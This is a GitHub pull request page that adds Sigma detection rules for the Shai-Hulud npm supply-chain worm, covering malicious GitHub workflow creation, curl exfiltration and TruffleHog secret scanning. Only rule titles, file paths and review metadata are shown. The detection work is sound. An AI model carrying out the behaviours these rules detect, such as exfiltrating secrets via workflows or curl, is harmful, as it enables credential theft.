Skip to content

feat: shai hulud worm targeting npm supply chain attack#5658

Merged
swachchhanda000 merged 8 commits intoSigmaHQ:masterfrom
swachchhanda000:shai_hulud_npm_worm
Oct 19, 2025
Merged

feat: shai hulud worm targeting npm supply chain attack#5658
swachchhanda000 merged 8 commits intoSigmaHQ:masterfrom
swachchhanda000:shai_hulud_npm_worm

Conversation

@swachchhanda000
Copy link
Copy Markdown
Collaborator

@swachchhanda000 swachchhanda000 commented Sep 24, 2025
edited
Loading

Summary of the Pull Request

Changelog

new - Shai-Hulud Malicious GitHub Workflow Creation
new - Shai-Hulud NPM Attack GitHub Activity
new - Shai-Hulud NPM Package Malicious Exfiltration via Curl
new - PUA - TruffleHog Execution
new - PUA - TruffleHog Execution - Linux

Example Log Event

Fixed Issues

SigmaHQ Rule Creation Conventions

  • If your PR adds new rules, please consider following and applying these conventions

@github-actions github-actions bot added Rules Windows Pull request add/update windows related rules Emerging-Threats labels Sep 24, 2025
@nasbench nasbench added this to the Sigma-October-Release milestone Oct 12, 2025
Copilot AI reviewed Oct 19, 2025
View reviewed changes
Copy link
Copy Markdown
Contributor

Copilot AI left a comment

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Pull Request Overview

Adds new Sigma rules to detect Shai-Hulud NPM supply chain attack behaviors (malicious workflow creation, GitHub activity, data exfiltration) and potentially unwanted TruffleHog executions on Windows and Linux.

  • Introduces TruffleHog PUA process creation detection for Windows and Linux.
  • Adds emerging threat rules for Shai-Hulud malicious workflow file creation, GitHub audit activity, and curl-based exfiltration.
  • Provides campaign-focused tagging and references for emerging threat context.

Reviewed Changes

Copilot reviewed 5 out of 5 changed files in this pull request and generated 11 comments.

Show a summary per file
File Description
rules/windows/process_creation/proc_creation_win_pua_trufflehog.yml New Windows TruffleHog execution detection rule.
rules/linux/process_creation/proc_creation_lnx_pua_trufflehog.yml New Linux TruffleHog execution detection rule.
rules-emerging-threats/2025/Malware/Shai-Hulud/proc_creation_lnx_mal_shai_hululd_exfiltration.yml Curl-based exfiltration detection for Shai-Hulud on Linux.
rules-emerging-threats/2025/Malware/Shai-Hulud/github_mal_shai_hulud_npm_attack.yml GitHub audit rule for malicious workflow activity.
rules-emerging-threats/2025/Malware/Shai-Hulud/file_event_lnx_mal_shai_hulud_workflow.yml Detects creation of malicious workflow file on filesystem.

Tip: Customize your code reviews with copilot-instructions.md. Create the file or learn how to get started.

@swachchhanda000 swachchhanda000 merged commit 208fee5 into SigmaHQ:master Oct 19, 2025
13 checks passed
swachchhanda000 added a commit to montysecurity/sigma that referenced this pull request Nov 19, 2025
@swachchhanda000
Merge PR SigmaHQ#5658 from @swachchhanda000 - feat: shai hulud worm t…
9dbe763 
…argeting npm supply chain attack

new - Shai-Hulud Malicious GitHub Workflow Creation
new - Shai-Hulud NPM Attack GitHub Activity
new - Shai-Hulud NPM Package Malicious Exfiltration via Curl
new - PUA - TruffleHog Execution
new - PUA - TruffleHog Execution - Linux
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Reviewers

Copilot code review Copilot Copilot left review comments

@nasbench nasbench nasbench approved these changes

@phantinuss phantinuss phantinuss approved these changes

Assignees

No one assigned

Labels

Emerging-Threats Ready to Merge Rules Windows Pull request add/update windows related rules

Projects

None yet

Milestone

Sigma-November-Release

Development

Successfully merging this pull request may close these issues.

4 participants

@swachchhanda000 @nasbench @phantinuss